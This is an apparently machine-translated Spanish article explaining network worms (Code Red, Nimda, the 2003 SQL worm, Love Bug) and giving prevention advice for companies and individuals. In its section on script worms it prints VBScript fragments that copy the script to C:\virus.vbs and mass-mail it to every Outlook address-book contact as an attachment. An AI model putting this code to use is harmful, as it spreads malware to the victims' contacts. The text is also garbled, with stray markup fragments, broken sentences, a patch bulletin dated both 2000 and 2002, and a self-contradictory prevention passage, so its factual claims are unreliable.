Red de conocimiento informático - Conocimiento sistemático - ¿Busca un antivirus manual avanzado? Lo mejor es explicarle cómo encontrar virus y analizar códigos de virus.

¿Busca un antivirus manual avanzado? Lo mejor es explicarle cómo encontrar virus y analizar códigos de virus.

Todos los programas que pueden provocar fallos de funcionamiento en el ordenador y destruir datos informáticos se denominan colectivamente virus informáticos. Entonces, en este sentido, ¡un gusano también es un virus! Los gusanos de red, como un tipo de programa informático que daña gravemente Internet, no pueden ignorarse su poder destructivo y su contagio. A diferencia de los virus tradicionales, los gusanos utilizan las computadoras como portador y la red como objetivo del ataque. Este artículo divide los virus gusanos en dos categorías: redes empresariales y usuarios individuales, y analiza las características de los virus gusanos y algunas medidas preventivas tanto desde el punto de vista de los usuarios empresariales como de los usuarios individuales.

¡Este artículo se basa en el ataque! Mecanismo de virus de gusano, divídalos en dos tipos: explotación de vulnerabilidades a nivel del sistema (propagación activa) y explotación de ingeniería social (propagación engañosa). Desde la perspectiva del usuario, los gusanos se dividen en dos categorías: redes empresariales y usuarios individuales. y usuarios individuales Discuta las características de los virus de gusanos y algunas medidas preventivas desde dos aspectos.

Contenido

1. Definición de virus de gusanos

1. virus

2. Similitudes y diferencias entre los virus de gusanos y los virus generales

3. Peligros y tendencias de los virus de gusanos

2. /p>

1, Análisis de virus gusanos malignos que aprovechan las vulnerabilidades del sistema

2. Medidas de prevención empresarial contra virus gusanos

3. usuarios

4. Medidas preventivas para usuarios individuales contra gusanos

3. La importancia práctica de estudiar gusanos

1. p>1. La definición de gusanos

p>

Los virus informáticos se han convertido en una gran amenaza para las computadoras desde su aparición. Cuando la red se desarrolla rápidamente, ¡el daño causado por los gusanos comienza a aparecer! Desde una definición amplia, cualquier programa que pueda provocar fallos de funcionamiento en la computadora y destruir datos informáticos se denomina colectivamente virus informático. Entonces, en este sentido, ¡un gusano también es un virus! Pero existe una gran diferencia entre los gusanos y los virus en general. Actualmente no existe un sistema teórico completo para los gusanos. Generalmente se cree que los gusanos son virus malignos que se propagan a través de la red y tienen algunas de las características de los virus, como la capacidad de propagación y el ocultamiento. , destructividad, etc., y también tiene algunas características propias, como no utilizar archivos para ser parásitos (algunos solo existen en la memoria), provocar denegación de servicio a la red y combinarse con tecnología pirata, etc. En términos de destructividad, los gusanos no son comparables a los virus comunes. El desarrollo de la red permite que los gusanos se propaguen por toda la red en un corto período de tiempo, provocando la parálisis de la red.

En este documento, los gusanos se dividen en dos categorías según las condiciones del usuario. Una es para usuarios corporativos y redes de área local. Este tipo de virus explota las vulnerabilidades del sistema y ataca activamente, que puede atacar a todo Internet. ¡Puede causar consecuencias paralizantes! Representado por "Code Red", "Nimda" y el último "SQL Worm King". El otro tipo es un virus gusano que se dirige a usuarios individuales y se propaga rápidamente a través de Internet (principalmente en forma de correos electrónicos y páginas web maliciosas). Tomemos como ejemplos el virus love bug y el virus de la carta de presentación. La categoría tiene una gran Es activo y agresivo, y el brote también es repentino, pero relativamente hablando, no es difícil matar este virus. El segundo tipo de virus se propaga de una manera más compleja y diversa. Algunos explotan las vulnerabilidades de las aplicaciones de Microsoft y muchos más utilizan la ingeniería social () para engañar e inducir a los usuarios. Las pérdidas causadas por este tipo de virus también son muy grandes. difícil de erradicar, por ejemplo, el virus de la carta de presentación fue descubierto por los principales fabricantes de antivirus en 2001, pero hasta finales de 2002 ocupó el primer lugar en la clasificación de peligros de virus. ¡Esta es la prueba! En el siguiente contenido se analizarán respectivamente algunas características y medidas preventivas de estos dos virus.

2 Similitudes y diferencias entre los virus de gusano y los virus en general

¡El gusano también es un tipo de! Los virus, por tanto, tienen las mismas características que los virus.

Un virus general debe ser parásito. Puede escribir su propio código de instrucción en el cuerpo de otros programas mediante la ejecución de sus propias instrucciones. El archivo infectado se denomina "host", por ejemplo, un archivo ejecutable en el formato de Windows. es el formato pe (ejecutable portátil). Cuando necesite infectar un archivo pe, cree una nueva sección en el programa host, escriba el código del virus en la nueva sección, modifique el punto de entrada del programa, etc. Cuando se ejecuta el programa, puede ejecutar el programa antivirus primero. Una vez que el programa antivirus termina de ejecutarse, el control se transfiere a las instrucciones del programa original del host. Se puede ver que los virus infectan principalmente archivos. Por supuesto, también hay virus de enlaces como DIRII y virus del sector de arranque. El virus del sector de arranque infecta el sector de arranque del disco. Si el disquete está infectado, después de que el disquete se use en otras máquinas, también infectará otras máquinas, por lo que el método de transmisión también es a través de disquetes.

Los gusanos generalmente no utilizan el método de insertar archivos en formato pe, sino que se copian a sí mismos y se propagan en el entorno de Internet. La infectividad de los virus se debe principalmente al sistema de archivos de la computadora y a la infectividad de los mismos. gusanos El objetivo son todas las computadoras en Internet Las carpetas compartidas en condiciones de red de área local, los correos electrónicos, las páginas web maliciosas en la red y una gran cantidad de servidores con vulnerabilidades se han convertido en buenas formas de propagación del gusano. El desarrollo de Internet también ha permitido que los gusanos se propaguen por todo el mundo en unas pocas horas. Además, la agresividad activa y la aparición repentina de gusanos dejarán a la gente indefensa.

¡Es previsible que en el futuro esto suceda! Traerá consecuencias importantes a la red. ¡La principal causa del desastre deben ser los gusanos de red!

3. El daño y la tendencia de desarrollo de los gusanos

En 1988, un virus gusano fue escrito por Morris, estudiante de posgrado de la Universidad de CORNELL en Estados Unidos, se propagó y provocó que miles de computadoras se apagaran y comenzaron a aparecer gusanos en la red, después, cuando los virus Code Red y Nimda se volvieron locos, causaron miles de millones de dólares en pérdidas; El 26 de enero de 2003, hora de Beijing, un virus llamado "2003 Worm King" se propagó rápidamente y atacó al mundo, provocando una grave congestión en la red de Internet y la parálisis del servidor de nombres de dominio (DNS), que es el principal. fundación de Internet, provocó una desaceleración significativa en la velocidad de los usuarios de Internet que navegan por páginas de Internet y envían y reciben correos electrónicos. Al mismo tiempo, la velocidad de los cajeros automáticos de los bancos se interrumpe, el funcionamiento de los sistemas de reserva en línea, como los boletos aéreos. interrumpido y las tarjetas de crédito y otros sistemas de pago fallan. ¡Los expertos estiman que las pérdidas económicas directas causadas por este virus son de al menos 1.200 millones de dólares!

¡Como se puede ver en la tabla, el gusano Los virus bloquean la red! y causar enormes pérdidas económicas.

A través del análisis de los virus de gusanos anteriores, podemos conocer algunas de las características y tendencias de desarrollo de los ataques de gusanos:

1. sistemas operativos y aplicaciones para atacar activamente. Estos virus son principalmente "Code Red" y "Nimda", así como "Cover Letter", que aún hoy están muy extendidos debido a la vulnerabilidad del navegador IE (Iframe ExecCommand). Los correos electrónicos infectados con el virus "Nimda" pueden activar el virus sin abrir manualmente los archivos adjuntos. Anteriormente, incluso muchos expertos en antivirus siempre han creído que los correos electrónicos con archivos adjuntos de virus se pueden activar siempre que no los abran manualmente. Los virus no son dañinos. "Code Red" aprovecha una vulnerabilidad en el software del servidor Microsoft IIS (desbordamiento de búfer remoto idq.dll) para propagarse. ¡El virus Sql Worm King aprovecha una vulnerabilidad en el sistema de base de datos de Microsoft para realizar ataques masivos!

2. Existen varios métodos de transmisión, como el virus "Nimda" y el virus "Cover Letter". , correos electrónicos, servidores web, uso compartido de redes, etc.

3. Nueva tecnología de producción de virus. A diferencia de los virus tradicionales, muchos virus nuevos utilizan los últimos lenguajes de programación y programación. fácil de modificar para producir nuevas variantes, evadiendo así la búsqueda de software antivirus. Además, los nuevos virus utilizan Java, ActiveX, VB Script y otras tecnologías para acechar en las páginas HTML y activarse al navegar por Internet.

4. ¡Combinado con tecnología de piratería! Las amenazas y pérdidas potenciales son aún mayores. Tomando Code Red como ejemplo, se generará un archivo root.exe en \scripts en el directorio web de la máquina infectada. se puede ejecutar cualquier comando de forma remota, para que los piratas informáticos puedan ingresar nuevamente.

2. Análisis y prevención de gusanos de red

Una característica que diferencia a los gusanos de los virus comunes es que los gusanos. A menudo se pueden aprovechar las vulnerabilidades. Las vulnerabilidades o defectos se pueden dividir en dos tipos: defectos de software y defectos humanos. Los defectos del software, como el desbordamiento remoto, las vulnerabilidades de ejecución automática en Microsoft IE y Outlook, etc., requieren la cooperación de los fabricantes y usuarios de software para actualizar continuamente el software. Los defectos humanos se refieren principalmente a la negligencia de los usuarios de computadoras. Esto se llama ingeniería social. Cuando reciben una carta de presentación viral por correo, la mayoría de las personas hacen clic en ella por curiosidad. Para los usuarios empresariales, las amenazas se centran principalmente en la seguridad de los servidores y el software de aplicaciones a gran escala, mientras que para los usuarios individuales, el objetivo principal es prevenir la segunda falla.

1. Análisis de gusanos maliciosos que explotan las vulnerabilidades del sistema.

Entre este tipo de virus, los gusanos Code Red, Nimda y SQL son los representantes. Tienen las mismas características. ¡Utiliza un determinado! Vulnerabilidad en los servidores de Microsoft y componentes de aplicaciones para atacar. Dado que tales vulnerabilidades son relativamente comunes en Internet, los virus se pueden propagar fácilmente. ¡Y la mayoría de los objetivos del ataque son servidores, por lo que la congestión de la red es grave! Tomemos como ejemplo el gusano SQL que estalló el 26 de enero de 2003, a las pocas horas del brote, se extendió por la red global, causando atascos de tráfico en la red, entre los países asiáticos, Corea del Sur, con una tasa de penetración de Internet en la población del 70%. , se vio más gravemente afectado. Los sistemas de las dos principales empresas de redes de Corea del Sur, KFT y South Korea Telecom, han quedado paralizados y otros usuarios de la red se han visto obligados a desconectarse. Lo que es más grave es que los cajeros automáticos de muchos bancos no funcionan correctamente. Bank of America, los 13.000 cajeros automáticos del banco ya no pueden realizar retiros de efectivo normales. ¡Los gusanos de red han comenzado a tener un gran impacto en la vida de las personas!

Este gusano SQL ataca el sistema de base de datos Microsoft SQL Server 2000, utilizando la vulnerabilidad de desbordamiento del búfer de pila remota del servicio MSSQL2000, Microsoft SQL Server 2000 es un comercial. Sistema de base de datos a gran escala desarrollado por Microsoft. SQL Server escucha el puerto UDP 1434. El cliente puede consultar los métodos de conexión disponibles actualmente enviando un mensaje a este puerto (el método de conexión puede ser una canalización con nombre o TCP). Sin embargo, este programa tiene serias vulnerabilidades cuando el cliente envía un. Un paquete excesivamente largo provocará un desbordamiento del búfer y los piratas informáticos pueden utilizar esta vulnerabilidad para ejecutar su propio código malicioso en la máquina remota.

Microsoft publicó un boletín de seguridad para esta vulnerabilidad en julio de 2000, pero cuando estalló el gusano SQL, todavía había una gran cantidad de servidores equipados con MS SQLServer 2000 que no tenían instalados los últimos parches. , es explotado por el gusano. El gusano obtiene de forma remota los derechos de control del sistema del otro host a través de un código malicioso de 376 bytes y obtiene tres direcciones API de Win32, GetTickCount, socket y sendto. número aleatorio. Entrando en un bucle infinito y continuando extendiéndose. En este bucle, el gusano utiliza el número aleatorio obtenido para generar una dirección IP aleatoria y luego envía su propio código al puerto 1434 (puerto abierto de Microsoft SQL Server). El gusano se propaga extremadamente rápido y utiliza paquetes de difusión para enviar su propio código. Cada vez se atacan las 255 máquinas posibles de la subred. Dado que se trata de un proceso de bucle infinito, la densidad del envío de paquetes solo está relacionada con el rendimiento de la máquina y el ancho de banda de la red, por lo que la cantidad de datos enviados es muy grande.

El gusano no causó ningún daño malicioso a la máquina infectada, ni escribió archivos en el disco duro, sólo existía en la memoria. Para los sistemas infectados, el gusano se puede eliminar después de reiniciar, pero aún pueden ocurrir reinfecciones. Dado que el envío de paquetes de datos consume muchos recursos del sistema y ancho de banda de la red, se forma Udp Flood y el rendimiento de la red infectada con este gusano se verá extremadamente degradado. Mientras una o dos máquinas en una red de 100 M estén infectadas con el gusano, se bloqueará el acceso a toda la red.

A través del análisis anterior, podemos saber que el gusano en sí no tiene otras medidas destructivas además de causar un ataque de denegación de servicio en la red. Sin embargo, si el creador del virus agrega código destructivo al escribir el virus, el virus no funcionará. ¡Las consecuencias serán desastrosas!

2. Medidas empresariales para prevenir los virus gusanos

¡Las vulnerabilidades explotadas por el virus gusano SQL se detallaron en un boletín de seguridad de Microsoft en julio de 2002! Además, Microsoft también ha proporcionado parches de seguridad para descargar. Sin embargo, después de medio año, todavía hay una gran cantidad de servidores en Internet que no han instalado los últimos parches. ¡Esto demuestra la conciencia de seguridad de los administradores de red!

Actualmente, las redes empresariales se utilizan principalmente para compartir servicios de impresión y archivos, sistemas de automatización de oficinas, sistemas empresariales (MIS), aplicaciones de Internet y otros campos. La red tiene las características de un conveniente intercambio de información y los gusanos también pueden aprovechar al máximo la red para propagarse rápidamente y lograr su propósito de bloquear la red. Cuando las empresas hacen un uso completo de la red para el procesamiento comercial, deben considerar los problemas de prevención de virus de la empresa para garantizar que los datos comerciales relacionados con el destino de la empresa estén intactos y no destruidos.

Cuando las empresas previenen y controlan los virus gusanos, deben considerar varias cuestiones: capacidades de detección y eliminación de virus, capacidades de monitoreo de virus y capacidades de respuesta a nuevos virus. Un aspecto importante del antivirus empresarial es la gestión y la estrategia. Las estrategias recomendadas para que las empresas prevengan los virus gusanos son las siguientes:

1. Fortalecer el nivel de gestión de seguridad de los administradores de red y mejorar la conciencia de seguridad. Dado que los gusanos aprovechan las vulnerabilidades del sistema para atacar, es necesario mantener la seguridad del sistema y el software de la aplicación lo antes posible y mantener actualizados varios sistemas operativos y software de la aplicación. Debido a la aparición de diversas vulnerabilidades, la seguridad ya no es una cuestión de una vez por todas. Como usuarios empresariales, el riesgo de ataques está aumentando, lo que requiere que las empresas tengan niveles de gestión y conciencia de seguridad cada vez más altos.

2. Establecer un sistema de detección de virus. Capacidad para detectar anomalías en la red y ataques de virus a la primera.

3. ¡Establezca un sistema de respuesta a emergencias para minimizar los riesgos! Debido a la naturaleza repentina del brote del gusano, es posible que se haya extendido a toda la red cuando se descubre el virus. Por lo tanto, en caso de emergencia, es necesario establecer un sistema de respuesta de emergencia que pueda brindar soluciones tan pronto como aparezca el virus. estalla.

4. Establecer un sistema de respaldo ante desastres. Para bases de datos y sistemas de datos, se deben adoptar medidas de respaldo periódicas y de múltiples máquinas para evitar la pérdida de datos en desastres inesperados.

5. Para las redes de área local, se pueden utilizar los siguientes métodos principales: (1) Instalar productos antivirus de firewall en el punto de acceso a Internet para aislar los virus de la red de área local. (2) Supervise el servidor de correo para evitar la propagación de correos electrónicos venenosos. (3) Proporcionar capacitación en seguridad a los usuarios de LAN.

(4) Establecer un sistema de actualización dentro de la LAN, que incluya actualizaciones de parches para varios sistemas operativos, actualizaciones para varios software de aplicaciones de uso común, actualizaciones para varias bases de datos de virus de software antivirus, etc.

3. Gusanos que suponen una amenaza directa para usuarios individuales

Entre los gusanos analizados anteriormente, sólo atacan a sistemas que tienen instalados componentes específicos de Microsoft, pero no atacan a la mayoría de individuos. En lo que respecta a los usuarios, no instalarán iis (el programa de servidor de Internet de Microsoft que permite proporcionar servicios web en línea) ni un enorme sistema de base de datos. Por lo tanto, los virus mencionados anteriormente no atacarán directamente las computadoras de los usuarios individuales (por supuesto, pueden tener un impacto indirecto a través de la red), pero los gusanos analizados a continuación son la mayor amenaza para los usuarios individuales, y también son los más difíciles de erradicar. , causando pérdidas. ¡Una clase más grande de gusanos!

Para los usuarios individuales, los gusanos más amenazadores generalmente se propagan a través del correo electrónico y páginas web maliciosas, etc.

Los gusanos que se propagan por correo electrónico suelen utilizar ingeniería social, es decir, se propagan utilizando diversos medios engañosos para atraer a los usuarios a hacer clic.

Una página web maliciosa es exactamente un programa de código de destrucción de piratas informáticos, que está incrustado en la página web. Cuando un usuario, sin saberlo, abre una página web que contiene un virus, el virus atacará. El principio de esta tecnología de inserción de código de virus no es complicado, por lo que será utilizado por muchas personas con intenciones maliciosas. En muchos sitios web de piratas informáticos han aparecido foros sobre la tecnología de uso de páginas web para destruir y, por lo tanto, ofrecen descargas de códigos de programas de destrucción. causando maliciosos La proliferación a gran escala de páginas web también ha provocado que cada vez más usuarios sufran pérdidas.

Para páginas web maliciosas, a menudo se utiliza la programación de scripts vb y java script. ¡Porque el método de programación es muy sencillo! ¡Así que es muy popular en Internet!

Los scripts Vb y Java son analizados y ejecutados por wsh (Windows Scripting HostWindows Scripting Host) del sistema operativo Microsoft. Debido a que su programación es muy simple, estos virus de script se propagaron locamente en Internet y desaparecieron. Loco por un tiempo. El virus lovebug es un virus de script VBS, que luego se disfraza como un archivo adjunto de correo electrónico para atraer a los usuarios a hacer clic y ejecutar. Lo que es aún más aterrador es que dicho virus aparece en forma de código fuente. sabe un poco sobre programación de scripts y puede modificar el código, formando varias variantes.

El siguiente es un script simple como ejemplo:

Set objFs=CreateObject

("Scripting.FileSystemObject") (Crear un objeto del sistema de archivos)

p>

objFs.CreateTextFile ("C:\virus.txt", 1)

(El archivo TXT se crea mediante el método de objeto del sistema de archivos)

Si ponemos esto, guarde las dos oraciones como un archivo de script VB .vbs. Haga clic para crear un archivo TXT en la unidad C.

Si cambiamos la segunda frase a:

objFs.GetFile (WScript.ScriptFullName).Copy ("C:\virus.vbs")

Puede copiarse al archivo virus.vbs en la unidad C. El comienzo de esta oración es para abrir el archivo de secuencia de comandos. WScript.ScriptFullName indica el programa en sí, que es el nombre del archivo de ruta completo. La función GetFile obtiene este archivo y la función Copiar lo copia en el archivo virus.vbs en el directorio raíz de la unidad C. Dos oraciones tan simples realizan la función de autorreplicación y ya poseen las características básicas de los virus: la capacidad de autorreplicación.

Este tipo de virus a menudo se propaga a través del correo electrónico. Es muy sencillo llamar a la función de envío de correo electrónico en el script vb. El método que suelen utilizar los virus es enviar un mensaje que contenga Para lograr el propósito de difusión. un ejemplo sencillo es el siguiente:

Set objOA=Wscript.CreateObject ("Outlook.Application") (Crear un objeto de aplicación OUTLOOK)

Set objMapi=objOA.GetNameSpace ("MAPI ") (Obtener el espacio de nombres MAPI)

Para i=1 a objMapi.AddressLists.Count (recorrer la libreta de direcciones)

Establecer objAddList=objMapi. AddressLists (i)

Para j=1 a objAddList.AddressEntries.Count

Establecer objMail=objOA.CreateItem (0)

objMail.Recipients.Add (objAddList.AddressEntries (j)) (Obtenga la dirección de correo electrónico del destinatario)

objMail.Subject="¡Hola!" (Establezca el asunto del correo electrónico, esto suele ser muy tentador)

objMail.Body="El archivo adjunto para usted ¡Esta vez es mi nuevo documento!" (Establecer el contenido de la carta)

objMail.Attachments.Add ("c:\virus.vbs") (Colocar como archivos adjuntos)

objMail.Send (enviar correo)

Siguiente

Siguiente

Establecer objMapi=Nada (borrar variable objMapi, liberar recursos)

set objOA=Nada (borrar la variable objOA)

La función de este pequeño fragmento de código es enviar un correo electrónico al usuario en la libreta de direcciones e incluirse como un archivo adjunto extendido. La primera línea de este código crea un objeto de Outlook y es esencial. Debajo hay un bucle que envía continuamente cartas con el mismo contenido a direcciones de correo electrónico en la libreta de direcciones. Así de transmisibles son los gusanos.

Se puede ver que es muy fácil usar vb script para escribir virus, lo que hace que dichos virus tengan muchas variantes, sean extremadamente destructivos y también muy difíciles de erradicar.

4. Medidas preventivas para usuarios individuales contra gusanos

A través del análisis anterior, podemos saber que los virus no dan mucho miedo. Los gusanos de red atacan principalmente a usuarios individuales, no a través de la ingeniería social. ¡Explotando las vulnerabilidades del sistema! Por lo tanto, es necesario prestar atención a los siguientes puntos para prevenir este tipo de virus:

1. ¡Compre el software antivirus adecuado! El desarrollo de gusanos de red ha dejado obsoleto el tradicional "sistema de monitoreo en tiempo real a nivel de archivos" del software antivirus. ¡El software antivirus debe evolucionar hacia el monitoreo de la memoria en tiempo real y el monitoreo del correo electrónico en tiempo real! Además, frente a los virus web difíciles de prevenir, los usuarios tienen requisitos cada vez mayores para el software antivirus. En el mercado de software antivirus, la serie de software antivirus Norton de Symantec tiene una gran proporción en el mundo. Después de muchas pruebas, los scripts del software de la serie antivirus Norton y la tecnología de bloqueo de gusanos pueden bloquear la mayoría de los virus del correo electrónico y también tienen sólidas capacidades de prevención contra los virus web. En la actualidad, el software antivirus nacional también ha alcanzado un nivel muy alto. Serie kv de software antivirus, que integra potentes funciones de protección contra incendios con software antivirus, lo que tiene un gran efecto de restricción sobre gusanos y programas troyanos

2.

Actualice la base de datos de virus con frecuencia. El software antivirus detecta y elimina virus basándose en firmas de virus. Los virus aparecen sin cesar todos los días, especialmente en la era de Internet. Los gusanos se propagan rápidamente y tienen muchas variantes, por lo que la base de datos de virus debe actualizarse en cualquier momento. para que puedas comprobar y eliminar los virus más recientes.

3. Mejore el conocimiento antivirus. ¡No haga clic fácilmente en sitios desconocidos, ya que pueden contener códigos maliciosos!

Cuando ejecute IE, haga clic en "Herramientas → Opciones de Internet → Seguridad → Nivel de seguridad de la zona de Internet" y cambie el nivel de seguridad de "Medio" a "Alto". Debido a que este tipo de página web es principalmente ActiveX o Applet, los archivos de página web JavaScript que contienen código malicioso, deshabilitar todos los complementos y controles ActiveX, scripts Java, etc. en la configuración de IE pueden reducir en gran medida la posibilidad de ser infectado por código de página web malicioso. La solución específica es: haga clic en "Herramientas" → "Opciones de Internet" en la ventana de IE, seleccione la pestaña "Seguridad" en el cuadro de diálogo emergente y luego haga clic en el botón "Nivel personalizado", el cuadro de diálogo "Configuración de seguridad" Aparecerá un mensaje emergente y seleccione "Desactivar" para todos los complementos y controles ActiveX y todas las opciones relacionadas con Java. Sin embargo, hacerlo puede hacer que sea imposible navegar por algunos sitios web que normalmente usan ActiveX durante la navegación web futura.

4. No revise los correos electrónicos desconocidos a voluntad, especialmente los correos electrónicos con archivos adjuntos. Debido a que algunos correos electrónicos con virus pueden aprovechar las vulnerabilidades de IE y Outlook para ejecutarse automáticamente, los usuarios de computadoras deben actualizar los programas de IE y Outlook, así como otras aplicaciones de uso común.

3. La importancia práctica de estudiar los gusanos

Como un nuevo tipo de virus bajo el rápido desarrollo de Internet, los gusanos de red definitivamente representarán un gran peligro para la red. En términos de defensa, ya no puede ser resuelto por un solo proveedor de antivirus, sino que requiere la participación conjunta de empresas de seguridad de redes, proveedores de sistemas, proveedores de antivirus y usuarios para construir un sistema de prevención integral.

La combinación de gusanos y tecnología de piratas informáticos dificulta el análisis, la detección y la prevención de gusanos. Al mismo tiempo, también es necesario estudiar el establecimiento de un modelo matemático para la propagación de gusanos en la red y las características del tráfico de la red.